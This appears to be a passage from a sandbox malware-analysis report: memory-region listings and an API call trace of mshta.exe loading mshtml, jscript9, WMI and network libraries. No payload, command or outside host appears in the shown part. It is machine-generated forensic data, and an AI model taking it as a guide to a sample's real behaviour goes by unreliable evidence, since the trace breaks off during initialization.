start_va = 0x7ffb2dcd0000
end_va = 0x7ffb2dd07fff
entry_point = 0x7ffb2dcd0000
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")
Region:
id = 273
start_va = 0x7ffb314d0000
end_va = 0x7ffb31728fff
entry_point = 0x7ffb314d0000
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll")
Region:
id = 274
start_va = 0x7ffb377f0000
end_va = 0x7ffb37a5dfff
entry_point = 0x7ffb377f0000
region_type = mapped_file
name = "d3d10warp.dll"
filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll")
Region:
id = 275
start_va = 0xc0ab440000
end_va = 0xc0ab469fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0ab440000"
filename = ""
Region:
id = 276
start_va = 0xc0aace0000
end_va = 0xc0aace0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0aace0000"
filename = ""
Region:
id = 277
start_va = 0xc0ab470000
end_va = 0xc0ab470fff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ab470000"
filename = ""
Region:
id = 278
start_va = 0xc0ab480000
end_va = 0xc0ab480fff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ab480000"
filename = ""
Region:
id = 279
start_va = 0xc0ab490000
end_va = 0xc0ab58ffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ab490000"
filename = ""
Region:
id = 280
start_va = 0x7ff722896000
end_va = 0x7ff722897fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff722896000"
filename = ""
Region:
id = 281
start_va = 0xc0ab590000
end_va = 0xc0ab605fff
entry_point = 0xc0ab590000
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Region:
id = 282
start_va = 0xc0ab610000
end_va = 0xc0ac60ffff
entry_point = 0xc0ab610000
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 283
start_va = 0xc0ac610000
end_va = 0xc0ace0ffff
entry_point = 0xc0ac610000
region_type = mapped_file
name = "~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1462094071-1423818996-289466292-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat")
Region:
id = 284
start_va = 0x7ffb2e5a0000
end_va = 0x7ffb2e846fff
entry_point = 0x7ffb2e5a0000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 285
start_va = 0xc0ace10000
end_va = 0xc0ace10fff
entry_point = 0xc0ace10000
region_type = mapped_file
name = "counters.dat"
filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")
Region:
id = 286
start_va = 0xc0ace20000
end_va = 0xc0ace21fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0ace20000"
filename = ""
Region:
id = 287
start_va = 0xc0ace20000
end_va = 0xc0ad0b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0ace20000"
filename = ""
Region:
id = 288
start_va = 0xc0ad0c0000
end_va = 0xc0ad0dffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ad0c0000"
filename = ""
Region:
id = 289
start_va = 0x7ffb25340000
end_va = 0x7ffb25394fff
entry_point = 0x7ffb25340000
region_type = mapped_file
name = "wbemdisp.dll"
filename = "\\Windows\\System32\\wbem\\wbemdisp.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemdisp.dll")
Region:
id = 290
start_va = 0x7ffb33330000
end_va = 0x7ffb333aefff
entry_point = 0x7ffb33330000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 291
start_va = 0x7ffb3a9e0000
end_va = 0x7ffb3a9e7fff
entry_point = 0x7ffb3a9e0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 292
start_va = 0x7ffb3c570000
end_va = 0x7ffb3c5d8fff
entry_point = 0x7ffb3c570000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 293
start_va = 0x7ffb2e4a0000
end_va = 0x7ffb2e4b0fff
entry_point = 0x7ffb2e4a0000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 294
start_va = 0xc0ad0e0000
end_va = 0xc0ad0eefff
entry_point = 0xc0ad0e0000
region_type = mapped_file
name = "wbemdisp.tlb"
filename = "\\Windows\\System32\\wbem\\wbemdisp.tlb" (normalized: "c:\\windows\\system32\\wbem\\wbemdisp.tlb")
Region:
id = 295
start_va = 0x7ffb2d700000
end_va = 0x7ffb2d724fff
entry_point = 0x7ffb2d700000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 296
start_va = 0x7ffb2d730000
end_va = 0x7ffb2d743fff
entry_point = 0x7ffb2d730000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 827
start_va = 0x7ffb2d750000
end_va = 0x7ffb2d847fff
entry_point = 0x7ffb2d750000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 828
start_va = 0xc0ad0f0000
end_va = 0xc0ad0f4fff
entry_point = 0xc0ad0f0000
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 829
start_va = 0xc0ad100000
end_va = 0xc0ad105fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0ad100000"
filename = ""
Region:
id = 918
start_va = 0xc0ad100000
end_va = 0xc0ad101fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0ad100000"
filename = ""
Region:
id = 925
start_va = 0xc0ad0e0000
end_va = 0xc0ad0effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000c0ad0e0000"
filename = ""
Region:
id = 926
start_va = 0xc0ad110000
end_va = 0xc0ad20ffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ad110000"
filename = ""
Region:
id = 937
start_va = 0x7ffb21f00000
end_va = 0x7ffb2239afff
entry_point = 0x7ffb21f00000
region_type = mapped_file
name = "jscript9.dll"
filename = "\\Windows\\System32\\jscript9.dll" (normalized: "c:\\windows\\system32\\jscript9.dll")
Region:
id = 1001
start_va = 0xc0ace20000
end_va = 0xc0ace3ffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ace20000"
filename = ""
Region:
id = 1002
start_va = 0xc0ace40000
end_va = 0xc0ace8ffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ace40000"
filename = ""
Region:
id = 1003
start_va = 0x7ff722894000
end_va = 0x7ff722895fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff722894000"
filename = ""
Region:
id = 1004
start_va = 0xc0ace90000
end_va = 0xc0aceaffff
entry_point = 0x0
region_type = private
name = "private_0x000000c0ace90000"
filename = ""
Thread:
id = 1
os_tid = 0x210
[0030.235] GetStartupInfoW (in: lpStartupInfo=0xb8a8a2fd20 | out: lpStartupInfo=0xb8a8a2fd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0))
[0030.236] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7237f0000
[0030.236] __set_app_type (_Type=0x2)
[0030.236] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7237f1800) returned 0x0
[0030.236] __getmainargs (in: _Argc=0x7ff7237f3028, _Argv=0x7ff7237f3030, _Env=0x7ff7237f3038, _DoWildCard=0, _StartInfo=0x7ff7237f3044 | out: _Argc=0x7ff7237f3028, _Argv=0x7ff7237f3030, _Env=0x7ff7237f3038) returned 0
[0030.237] GetVersionExA (in: lpVersionInformation=0x7ff7237f35e0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7ff7237f35e0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0030.237] GetVersion () returned 0x23f00206
[0030.237] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x7ffb3d260000
[0030.237] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="HeapSetInformation") returned 0x7ffb3d280f40
[0030.237] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0030.237] LoadLibraryW (lpLibFileName="WLDP.DLL") returned 0x7ffb2bea0000
[0031.624] GetProcAddress (hModule=0x7ffb2bea0000, lpProcName="WldpGetLockdownPolicy") returned 0x7ffb2bea1010
[0031.624] WldpGetLockdownPolicy () returned 0x10000000
[0031.624] FreeLibrary (hLibModule=0x7ffb2bea0000) returned 1
[0031.628] RegOpenKeyExA (in: hKey=0xffffffff80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0xb8a8a2fc80 | out: phkResult=0xb8a8a2fc80*=0xb2) returned 0x0
[0031.629] RegQueryValueExA (in: hKey=0xb2, lpValueName=0x0, lpReserved=0x0, lpType=0xb8a8a2fc74, lpData=0xb8a8ff13a0, lpcbData=0xb8a8a2fc7c*=0x105 | out: lpType=0xb8a8a2fc74*=0x1, lpData="C:\\Windows\\System32\\mshtml.dll", lpcbData=0xb8a8a2fc7c*=0x1f) returned 0x0
[0031.629] LoadLibraryA (lpLibFileName="C:\\Windows\\System32\\mshtml.dll") returned 0x7ffb223a0000
[0033.738] HeapSetInformation (HeapHandle=0xb8a8c10000, HeapInformationClass=0x0, HeapInformation=0xb8a8a2f610, HeapInformationLength=0x4) returned 1
[0033.738] GetCurrentProcess () returned 0xffffffffffffffff
[0033.738] GetSystemInfo (in: lpSystemInfo=0x7ffb238e8da0 | out: lpSystemInfo=0x7ffb238e8da0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0033.738] GetVersionExW (in: lpVersionInformation=0x7ffb238e8e00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7ffb238e8e00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0033.738] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0xb8a8a2f180 | out: Buffer=0x0, ReturnedLength=0xb8a8a2f180) returned 0
[0033.739] GetLastError () returned 0x7a
[0033.739] GetLogicalProcessorInformation (in: Buffer=0xb8a8c1e2e0, ReturnedLength=0xb8a8a2f180 | out: Buffer=0xb8a8c1e2e0, ReturnedLength=0xb8a8a2f180) returned 1
[0033.739] GetEnvironmentVariableW (in: lpName="JS_DEBUG_SCOPE", lpBuffer=0xb8a8a2f1e0, nSize=0x104 | out: lpBuffer="\x0f") returned 0x0
[0033.741] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffb3d310000
[0033.741] GetProcAddress (hModule=0x7ffb3d310000, lpProcName="RtlGetDeviceFamilyInfoEnum") returned 0x7ffb3d383930
[0033.741] RtlGetDeviceFamilyInfoEnum (in: pullUAPInfo=0x7ffb238e8f20, pulDeviceFamily=0x7ffb238e8f28, pulDeviceForm=0x7ffb238e8f2c | out: pullUAPInfo=0x7ffb238e8f20, pulDeviceFamily=0x7ffb238e8f28, pulDeviceForm=0x7ffb238e8f2c)
[0033.748] IsDebuggerPresent () returned 0
[0033.749] __dllonexit () returned 0x7ffb22916650
[0033.749] __dllonexit () returned 0x7ffb22916680
[0033.749] __dllonexit () returned 0x7ffb22916690
[0033.749] IsDebuggerPresent () returned 0
[0033.749] __dllonexit () returned 0x7ffb22916640
[0033.749] __dllonexit () returned 0x7ffb229166b0
[0033.749] GlobalMemoryStatusEx (in: lpBuffer=0xb8a8a2f3b0 | out: lpBuffer=0xb8a8a2f3b0) returned 1
[0033.749] __dllonexit () returned 0x7ffb22916670
[0033.749] __dllonexit () returned 0x7ffb22916660
[0033.750] VirtualAlloc (lpAddress=0x0, dwSize=0x800000000, flAllocationType=0x2000, flProtect=0x4) returned 0xb8aa9d0000
[0033.750] __dllonexit () returned 0x7ffb22916570
[0033.750] __dllonexit () returned 0x7ffb229158c0
[0033.750] __dllonexit () returned 0x7ffb229158d0
[0033.751] __dllonexit () returned 0x7ffb229165e0
[0033.751] __dllonexit () returned 0x7ffb229165f0
[0033.751] __dllonexit () returned 0x7ffb22916600
[0033.751] __dllonexit () returned 0x7ffb22916610
[0033.751] __dllonexit () returned 0x7ffb229158f0
[0033.751] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc122
[0033.752] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc122
[0033.752] __dllonexit () returned 0x7ffb22915910
[0033.753] __dllonexit () returned 0x7ffb22915930
[0033.753] __dllonexit () returned 0x7ffb22915950
[0033.753] __dllonexit () returned 0x7ffb22915970
[0033.753] __dllonexit () returned 0x7ffb229159a0
[0033.753] __dllonexit () returned 0x7ffb22915980
[0033.753] __dllonexit () returned 0x7ffb229159c0
[0033.753] __dllonexit () returned 0x7ffb22915990
[0033.754] __dllonexit () returned 0x7ffb22915960
[0033.754] GlobalMemoryStatusEx (in: lpBuffer=0xb8a8a2f3b0 | out: lpBuffer=0xb8a8a2f3b0) returned 1
[0033.754] __dllonexit () returned 0x7ffb229159d0
[0033.754] __dllonexit () returned 0x7ffb229159e0
[0033.754] __dllonexit () returned 0x7ffb22915a00
[0033.754] __dllonexit () returned 0x7ffb22915a20
[0033.754] __dllonexit () returned 0x7ffb22915a40
[0033.754] __dllonexit () returned 0x7ffb22915a50
[0033.754] __dllonexit () returned 0x7ffb22915a70
[0033.755] __dllonexit () returned 0x7ffb22915a90
[0033.756] QueryPerformanceFrequency (in: lpFrequency=0xb8a8a2f410 | out: lpFrequency=0xb8a8a2f410) returned 1
[0033.756] __dllonexit () returned 0x7ffb22915ab0
[0033.756] __dllonexit () returned 0x7ffb22915ad0
[0033.756] __dllonexit () returned 0x7ffb22915b40
[0033.756] __dllonexit () returned 0x7ffb22915b00
[0033.756] __dllonexit () returned 0x7ffb22915b10
[0033.756] __dllonexit () returned 0x7ffb22915b20
[0033.756] __dllonexit () returned 0x7ffb22915b30
[0033.756] __dllonexit () returned 0x7ffb22915af0
[0033.756] __dllonexit () returned 0x7ffb22915b50
[0033.756] __dllonexit () returned 0x7ffb22915b70
[0033.756] __dllonexit () returned 0x7ffb22915b60
[0033.756] __dllonexit () returned 0x7ffb22915b80
[0033.757] __dllonexit () returned 0x7ffb22915ba0
[0033.757] __dllonexit () returned 0x7ffb22915bc0
[0033.757] __dllonexit () returned 0x7ffb22915bd0
[0033.757] __dllonexit () returned 0x7ffb22915bf0
[0033.757] __dllonexit () returned 0x7ffb22915c70
[0033.757] __dllonexit () returned 0x7ffb22915c50
[0033.757] __dllonexit () returned 0x7ffb22915c30
[0033.757] __dllonexit () returned 0x7ffb22915c10
[0033.758] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238e5910 | out: ConditionVariable=0x7ffb238e5910)
[0033.758] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238e5930 | out: ConditionVariable=0x7ffb238e5930)
[0033.758] __dllonexit () returned 0x7ffb22915c90
[0033.758] __dllonexit () returned 0x7ffb22915ca0
[0033.758] __dllonexit () returned 0x7ffb22915cb0
[0033.758] __dllonexit () returned 0x7ffb22915cc0
[0033.758] __dllonexit () returned 0x7ffb22915ce0
[0033.758] __dllonexit () returned 0x7ffb22915d00
[0033.758] __dllonexit () returned 0x7ffb22915d20
[0033.758] __dllonexit () returned 0x7ffb22915d30
[0033.758] __dllonexit () returned 0x7ffb22915d50
[0033.759] __dllonexit () returned 0x7ffb22915d70
[0033.759] __dllonexit () returned 0x7ffb22915d90
[0033.759] __dllonexit () returned 0x7ffb22915da0
[0033.759] __dllonexit () returned 0x7ffb22915db0
[0033.759] __dllonexit () returned 0x7ffb22915dc0
[0033.759] __dllonexit () returned 0x7ffb22915dd0
[0033.759] __dllonexit () returned 0x7ffb22915de0
[0033.759] __dllonexit () returned 0x7ffb22915df0
[0033.759] __dllonexit () returned 0x7ffb22915e10
[0033.759] __dllonexit () returned 0x7ffb22915e30
[0033.759] __dllonexit () returned 0x7ffb22915e50
[0033.759] __dllonexit () returned 0x7ffb22915e60
[0033.759] __dllonexit () returned 0x7ffb22915e70
[0033.759] __dllonexit () returned 0x7ffb22915e90
[0033.759] __dllonexit () returned 0x7ffb22915ea0
[0033.759] __dllonexit () returned 0x7ffb22915ec0
[0033.759] __dllonexit () returned 0x7ffb22915ed0
[0033.759] __dllonexit () returned 0x7ffb22915f20
[0033.759] __dllonexit () returned 0x7ffb22915ee0
[0033.760] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238e5bf8 | out: ConditionVariable=0x7ffb238e5bf8)
[0033.760] __dllonexit () returned 0x7ffb22915f00
[0033.760] __dllonexit () returned 0x7ffb22915f10
[0033.760] __dllonexit () returned 0x7ffb22915f60
[0033.760] __dllonexit () returned 0x7ffb22915f40
[0033.760] __dllonexit () returned 0x7ffb22915f70
[0033.760] __dllonexit () returned 0x7ffb22915f90
[0033.760] __dllonexit () returned 0x7ffb22915fb0
[0033.760] __dllonexit () returned 0x7ffb22915fd0
[0033.760] __dllonexit () returned 0x7ffb22915fe0
[0033.760] __dllonexit () returned 0x7ffb22916000
[0033.760] __dllonexit () returned 0x7ffb22916010
[0033.760] __dllonexit () returned 0x7ffb22916020
[0033.760] __dllonexit () returned 0x7ffb22916040
[0033.760] __dllonexit () returned 0x7ffb22916050
[0033.761] __dllonexit () returned 0x7ffb22916060
[0033.761] __dllonexit () returned 0x7ffb229160c0
[0033.761] __dllonexit () returned 0x7ffb229160b0
[0033.761] __dllonexit () returned 0x7ffb22916080
[0033.761] __dllonexit () returned 0x7ffb229160a0
[0033.761] __dllonexit () returned 0x7ffb22916090
[0033.761] __dllonexit () returned 0x7ffb229160d0
[0033.761] __dllonexit () returned 0x7ffb229160f0
[0033.761] __dllonexit () returned 0x7ffb22916110
[0033.761] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153
[0033.761] __dllonexit () returned 0x7ffb22916120
[0033.761] __dllonexit () returned 0x7ffb22916140
[0033.761] __dllonexit () returned 0x7ffb22916130
[0033.763] EtwEventRegister (in: ProviderId=0x7ffb234935a0, EnableCallback=0x7ffb2244d760, CallbackContext=0x7ffb238b2fc0, RegHandle=0x7ffb238ec770 | out: RegHandle=0x7ffb238ec770) returned 0x0
[0033.763] EtwEventRegister (in: ProviderId=0x7ffb23493590, EnableCallback=0x7ffb2244d760, CallbackContext=0x7ffb238b37b0, RegHandle=0x7ffb238e9490 | out: RegHandle=0x7ffb238e9490) returned 0x0
[0033.763] EtwEventRegister (in: ProviderId=0x7ffb23493580, EnableCallback=0x7ffb2244d760, CallbackContext=0x7ffb238c72c0, RegHandle=0x7ffb238e9498 | out: RegHandle=0x7ffb238e9498) returned 0x0
[0033.764] RtlInitializeSListHead (in: ListHead=0xc0aa9d0110 | out: ListHead=0xc0aa9d0110)
[0033.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\ChakraRecycler", ulOptions=0x0, samDesired=0x20019, phkResult=0xb8a8a2f198 | out: phkResult=0xb8a8a2f198*=0x0) returned 0x2
[0033.764] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\ChakraRecycler", ulOptions=0x0, samDesired=0x20019, phkResult=0xb8a8a2f198 | out: phkResult=0xb8a8a2f198*=0x0) returned 0x2
[0033.764] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7237f0000
[0033.765] RtlInitializeSListHead (in: ListHead=0xc0aa9d03a0 | out: ListHead=0xc0aa9d03a0)
[0033.765] RtlInitializeSListHead (in: ListHead=0xc0aa9d03e0 | out: ListHead=0xc0aa9d03e0)
[0033.765] RtlInitializeSListHead (in: ListHead=0xc0aa9d0520 | out: ListHead=0xc0aa9d0520)
[0033.765] RtlInitializeSListHead (in: ListHead=0xc0aa9d0560 | out: ListHead=0xc0aa9d0560)
[0033.765] RtlInitializeSListHead (in: ListHead=0xc0aa9d06a0 | out: ListHead=0xc0aa9d06a0)
[0033.765] RtlInitializeSListHead (in: ListHead=0xc0aa9d06e0 | out: ListHead=0xc0aa9d06e0)
[0033.767] QueryPerformanceFrequency (in: lpFrequency=0xc0aa9e0168 | out: lpFrequency=0xc0aa9e0168) returned 1
[0033.767] GetTickCount () returned 0x1af46
[0033.767] GetTickCount () returned 0x1af46
[0033.767] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0033.767] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0033.767] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0033.767] VerifyVersionInfoW (in: lpVersionInformation=0xb8a8a2ee20, dwTypeMask=0x23, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0xb8a8a2ee20) returned 0
[0033.767] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0xb8a8b60000
[0033.768] VirtualAlloc (lpAddress=0xb8b6278000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0xb8b6278000
[0033.769] __dllonexit () returned 0x7ffb22916170
[0033.769] __dllonexit () returned 0x7ffb22916180
[0033.769] __dllonexit () returned 0x7ffb22916160
[0033.770] __dllonexit () returned 0x7ffb229161a0
[0033.771] __dllonexit () returned 0x7ffb22916190
[0033.771] __dllonexit () returned 0x7ffb229161b0
[0033.771] __dllonexit () returned 0x7ffb229161c0
[0033.771] __dllonexit () returned 0x7ffb229161d0
[0033.771] sqrtf (_X=0x7ffb223a8780) returned 0x40000000
[0033.772] __dllonexit () returned 0x7ffb229161f0
[0033.772] __dllonexit () returned 0x7ffb22916200
[0033.772] __dllonexit () returned 0x7ffb22916210
[0033.772] __dllonexit () returned 0x7ffb22916230
[0033.773] __dllonexit () returned 0x7ffb22916250
[0033.773] __dllonexit () returned 0x7ffb22916260
[0033.773] __dllonexit () returned 0x7ffb22916280
[0033.773] __dllonexit () returned 0x7ffb229162a0
[0033.773] __dllonexit () returned 0x7ffb229162c0
[0033.773] __dllonexit () returned 0x7ffb229162d0
[0033.773] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238e8618 | out: ConditionVariable=0x7ffb238e8618)
[0033.773] __dllonexit () returned 0x7ffb229162e0
[0033.773] __dllonexit () returned 0x7ffb229162f0
[0033.774] __dllonexit () returned 0x7ffb22916300
[0033.774] __dllonexit () returned 0x7ffb22916310
[0033.774] __dllonexit () returned 0x7ffb22916320
[0033.774] __dllonexit () returned 0x7ffb22916330
[0033.774] __dllonexit () returned 0x7ffb22916350
[0033.775] __dllonexit () returned 0x7ffb22916380
[0033.775] __dllonexit () returned 0x7ffb22916390
[0033.775] __dllonexit () returned 0x7ffb229163a0
[0033.775] __dllonexit () returned 0x7ffb229163b0
[0033.776] __dllonexit () returned 0x7ffb229163d0
[0033.776] __dllonexit () returned 0x7ffb229163f0
[0033.776] __dllonexit () returned 0x7ffb22916430
[0033.776] __dllonexit () returned 0x7ffb22916410
[0033.776] __dllonexit () returned 0x7ffb22916420
[0033.776] __dllonexit () returned 0x7ffb22916440
[0033.776] __dllonexit () returned 0x7ffb22916460
[0033.776] __dllonexit () returned 0x7ffb22916470
[0033.776] __dllonexit () returned 0x7ffb22916480
[0033.776] __dllonexit () returned 0x7ffb229164a0
[0033.776] __dllonexit () returned 0x7ffb229164b0
[0033.776] __dllonexit () returned 0x7ffb229164c0
[0033.776] __dllonexit () returned 0x7ffb229164d0
[0033.776] __dllonexit () returned 0x7ffb229164e0
[0033.776] __dllonexit () returned 0x7ffb229164f0
[0033.776] __dllonexit () returned 0x7ffb22916500
[0033.776] __dllonexit () returned 0x7ffb22916510
[0033.777] __dllonexit () returned 0x7ffb22916520
[0033.777] __dllonexit () returned 0x7ffb22916530
[0033.777] __dllonexit () returned 0x7ffb22916540
[0033.777] __dllonexit () returned 0x7ffb22916550
[0033.777] __dllonexit () returned 0x7ffb22916580
[0033.777] __dllonexit () returned 0x7ffb229165a0
[0033.777] __dllonexit () returned 0x7ffb22916630
[0033.777] __dllonexit () returned 0x7ffb22916620
[0033.777] LoadLibraryExW (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffb3d310000
[0033.777] __dllonexit () returned 0x7ffb229166a0
[0033.777] __dllonexit () returned 0x7ffb229166c0
[0033.778] GetCurrentThreadId () returned 0x210
[0033.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb8a8a2f1a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0033.778] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0033.778] StrCmpICW (pszStr1="mshta.exe", pszStr2="IEXPLORE.EXE") returned 4
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="MSFEEDSSYNC.EXE") returned 2
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="SYSPREP.EXE") returned -6
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="EXPLORER.EXE") returned 8
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="LOADER42.EXE") returned 1
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="WWAHOST.EXE") returned -10
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="IEUTLAUNCH.EXE") returned 4
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="TE.EXE") returned -7
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="Te.ProcessHost.exe") returned -7
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="FAKEVIRTUALSURFACETESTAPP.EXE") returned 7
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="MSOOBE.EXE") returned -7
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="NETPLWIZ.EXE") returned -1
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="USERACCOUNTBROKER.EXE") returned -8
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="MSHTMPAD.EXE") returned -12
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="FirstLogonAnim.exe") returned 7
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="RESTOREOPTIN.EXE") returned -5
[0033.779] StrStrIW (lpFirst="mshta.exe", lpSrch="DCIScanner") returned 0x0
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="microsoftedge.exe") returned 10
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="microsoftedgecp.exe") returned 10
[0033.779] StrCmpICW (pszStr1="mshta.exe", pszStr2="pickerhost.exe") returned -3
[0033.779] FindAtomW (lpString="{4653C0A4-2B2D-48DE-AB80-93910A28F900}") returned 0x0
